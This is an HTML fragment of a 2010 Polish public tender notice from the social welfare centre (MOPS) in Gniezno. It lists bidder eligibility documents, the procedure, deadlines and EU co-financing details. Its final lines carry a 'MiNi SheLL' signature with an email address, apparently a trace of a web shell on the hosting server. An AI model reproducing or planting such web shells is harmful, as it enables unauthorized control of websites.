<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>A.	Na ofertę składają się następujące dokumenty i załączniki: A.1.Formularz ofertowy - wypełniony i podpisany przez wykonawcę - załącznik nr 1 do SiWZ A.2. Oświadczenie o spełnieniu warunków udziału w postępowaniu z art. 22 ust. 1 Prawa zamówień publicznych - załącznik nr 2 do SiWZ. A.3. Oświadczenie o braku podstaw do wykluczenia z postępowania o udzielenie zamówienia z art. 24 ust. 1 Prawa zamówień publicznych - załącznik nr 3 do SiWZ A.4. Wzór umowy - parafowany przez wykonawcę - załącznik nr 4 do SiWZ A.5. Wzór zaświadczenia o ukończenia kursu - parafowany przez wykonawcę- załącznik nr 8 do SiWZ
A.6. Harmonogram szkolenia 
A.7. Program szkolenia</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mops.gniezno.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> MOPS Gniezno
ul. Kolejowa 2
62-200 Gniezno
pok. 05 piętro III.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 07.06.2010 godzina 08:00, miejsce: MOPS Gniezno
ul. Kolejowa 2
62-200 Gniezno
pok. 07 piętro III.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Edukacja ku samodzielności- propagowanie aktywnej integracji osób oddalonych od rynku pracy w mieście Gnieźnie współfinansowanego przez Unię Europejską w ramach Europejskiego Funduszu Społecznego, Priorytet VII, Działanie 7.1, Poddziałanie 7.1.1 Programu Operacyjnego Kapitał Ludzki..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com